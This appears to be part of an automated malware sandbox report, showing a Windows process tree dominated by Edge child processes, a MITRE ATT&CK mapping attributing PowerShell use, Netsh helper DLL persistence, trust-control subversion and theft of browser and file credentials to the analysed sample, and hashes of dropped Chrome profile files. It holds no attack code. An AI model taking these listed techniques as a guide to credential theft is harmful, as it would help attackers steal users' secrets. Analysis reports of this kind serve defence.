    C:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 448
    3⤵
    - Program crash
    PID:3288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4824 -ip 4824
1⤵
PID:1944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4824 -ip 4824
1⤵
PID:1532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:4496

C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:3168

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
- System Location Discovery: System Language Discovery
PID:1768

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5448

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:5520

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:5580

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:4856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa1ca03cb8,0x7ffa1ca03cc8,0x7ffa1ca03cd8
  2⤵
  PID:6020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2000 /prefetch:2
  2⤵
  PID:5948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2436 /prefetch:8
  2⤵
  PID:1900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
  2⤵
  PID:4240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
  2⤵
  PID:1960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4352 /prefetch:1
  2⤵
  PID:6000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:1
  2⤵
  PID:228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:1
  2⤵
  PID:924
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:1
  2⤵
  PID:1868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5564 /prefetch:8
  2⤵
  PID:1156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5576 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4328 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:1
  2⤵
  PID:580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5772 /prefetch:1
  2⤵
  PID:5124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1
  2⤵
  PID:3140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1
  2⤵
  PID:5732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1
  2⤵
  PID:5864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
  2⤵
  PID:3184
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
  2⤵
  PID:2168
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1
  2⤵
  PID:1696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6028 /prefetch:1
  2⤵
  PID:5504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1724 /prefetch:1
  2⤵
  PID:5924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6100 /prefetch:1
  2⤵
  PID:4136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:1
  2⤵
  PID:5988
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3516 /prefetch:8
  2⤵
  PID:2608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1
  2⤵
  PID:1312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6424 /prefetch:8
  2⤵
  PID:5444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6404 /prefetch:1
  2⤵
  PID:5840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7052 /prefetch:1
  2⤵
  PID:5892
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6680 /prefetch:1
  2⤵
  PID:1176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6204 /prefetch:1
  2⤵
  PID:6012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6368 /prefetch:1
  2⤵
  PID:4852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6576 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1
  2⤵
  PID:924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7712 /prefetch:1
  2⤵
  PID:4128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7696 /prefetch:1
  2⤵
  PID:2552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1304 /prefetch:1
  2⤵
  PID:504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7848 /prefetch:1
  2⤵
  PID:4936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7816 /prefetch:1
  2⤵
  PID:1144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7948 /prefetch:1
  2⤵
  PID:5112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8188 /prefetch:1
  2⤵
  PID:5588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7828 /prefetch:1
  2⤵
  PID:228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8304 /prefetch:1
  2⤵
  PID:1044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8812 /prefetch:1
  2⤵
  PID:4536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8504 /prefetch:1
  2⤵
  PID:2768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=8884 /prefetch:8
  2⤵
  PID:4368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6204 /prefetch:1
  2⤵
  PID:924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8788 /prefetch:8
  2⤵
  - NTFS ADS
  PID:1780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7592 /prefetch:1
  2⤵
  PID:5748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1988,13278082554932162829,4342814502077747320,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8988 /prefetch:8
  2⤵
  - NTFS ADS
  PID:1436

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3436

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3352

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004CC 0x00000000000004E0
1⤵
PID:4896

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5464

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
8f3184d2070af0aeb43a9d69ba7af7dd

SHA1
f10852e604966aa6c4f5265410567c4b5e620ba1

SHA256
429df6503c73b244eb02ee34632a4dfbc37178087ea379145754d00b150856d8

SHA512
918d55d3370a344ac317e7bf50b274f303524f85fb01f8c02bd95432df3a3a2607cf96cb4ccbb1a73bc2bc799922aaa83fcd41cc22f2567e13d6ce93f02b1d11

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

Filesize
211KB

MD5
e7226392c938e4e604d2175eb9f43ca1

SHA1
2098293f39aa0bcdd62e718f9212d9062fa283ab

SHA256
d46ec08b6c29c4ca56cecbf73149cc66ebd902197590fe28cd65dad52a08c4e1

SHA512
63a4b99101c790d40a813db9e0d5fde21a64ccaf60a6009ead027920dbbdb52cc262af829e5c4140f3702a559c7ac46efa89622d76d45b4b49a9ce01625ef145

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
192B

MD5
ac7f67c7302ef5e9b200560eaaeb4328

SHA1
f92fc697b3a9228cfb76d6e32aab07f8296ce363

SHA256
6bc2885686abf7922f62afb2ab4c67e5108a19c757239341783c4ab9240c57c8

SHA512
311aaa1a529362e677981488c98263d363cad1a3257158e06bca6f437cee13bd37174eb51182b1bd4000393231677cab8eaea78090c78c37b0a7331332a17062

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
464c195e6ae059c0d268f9486f0fd36e

SHA1
7d1091a3b40b3ba8d81e95b5fb97716d792c232e

SHA256
04a65f48df0fb1365b0673c4be40931ebd9c63e913580ba53a8b1bd0c32e7156

SHA512
932322f74e05fc7b37de48992a61fb8fde49443d2b372b0406ec5722019068ab9d935637e4aca7ed382bb3fc6f3305e659bccc48cc114b5f2e12da3d73ed67b4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

